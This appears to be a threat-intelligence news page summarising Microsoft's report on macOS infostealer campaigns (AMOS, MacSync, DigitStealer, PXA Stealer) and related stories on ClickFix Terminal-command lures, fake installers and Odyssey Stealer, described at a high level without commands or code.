Microsoft Warns macOS Infostealer Campaigns Using ClickFix Lures, Malicious DMGs, and Python Stealers
Microsoft reported that information-stealing malware activity is expanding from Windows to macOS, driven by campaigns observed since late 2025 that rely on social engineering and cross-platform tooling. The activity includes ClickFix-style prompts and malicious DMG installers that deliver macOS-focused infostealer families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer, with operators leveraging fileless execution, native macOS utilities, and AppleScript automation to evade defenses and automate collection.
Initial access commonly starts with malicious search ads (e.g., Google Ads) that redirect users to fake sites impersonating legitimate tools and then trick victims into running “fix” steps or installing trojanized software. The malware is assessed to target high-value data including browser credentials and session cookies, iCloud Keychain contents, crypto wallet data, and developer secrets; Microsoft also highlighted growing use of Python-based stealers distributed via phishing for rapid adaptation across heterogeneous environments, citing PXA Stealer (linked to Vietnamese-speaking actors) as an example used in late-2025 campaigns with persistence mechanisms such as registry Run keys or scheduled tasks and Telegram used for command-and-control.
Related Entities
Threat Actors
Affected Products
Sources
Related Stories
macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating **macOS infostealer** activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable *ChatGPT* and *Grok* conversation links via **Google Ads**, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the **“ClickFix”** social-engineering pattern. Executing the provided shell commands results in installation of **Atomic macOS Stealer (AMOS)**, which steals browser credentials, crypto wallet seed phrases, **Keychain** data, and personal files before exfiltrating them to attacker-controlled infrastructure. Separately, **Odyssey Stealer** intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through **fake software updates, cracked tools, and fraudulent apps**, and is designed to evade detection by generating a **unique fingerprint per infection**, frequently changing code structure, and using many distinct **SHA-256** variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
1 months ago
macOS Malware Campaigns Shift Toward Infostealers and Social Engineering to Bypass Apple Protections
Threat actors are increasingly targeting macOS users with **infostealers** and distribution-as-a-service models, reflecting a broader “gold rush” in Apple-focused malware development. Reporting highlights macOS stealers targeting browser credentials and cryptocurrency assets (including seed phrases) and notes tactics to evade Apple controls such as obtaining valid Apple developer signatures to bypass *Gatekeeper*; one cited example is *MacSync* being notarized and signed under Team ID `GNJLS3UYZ4`. The same reporting describes ecosystem-scale enablement, including large-scale compromise of WordPress sites for distribution and novel command-and-control approaches such as using blockchain smart contracts (e.g., on **BNB Smart Chain**), alongside paid-traffic abuse (e.g., promoting malicious AI chat content via ads) to push stealer payloads. Separately, a Darktrace-described investigation details a **multi-stage macOS malware** campaign that prioritizes *social engineering* over exploitation to defeat Apple’s **Transparency, Consent, and Control (TCC)** privacy framework. Victims are lured via phishing to open an AppleScript masquerading as a document (`Confirmation_Token_Vesting.docx.scpt`), which displays a fake “Compatibility” error and instructs the user to launch a “Compatibility Wizard” (e.g., using a keyboard shortcut) that effectively tricks them into authorizing execution and granting access. Together, the reporting indicates macOS threats are increasingly succeeding by combining credential/crypto theft objectives with user-prompt manipulation and trust-abuse techniques rather than relying on kernel or sandbox escapes.
1 months ago
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Today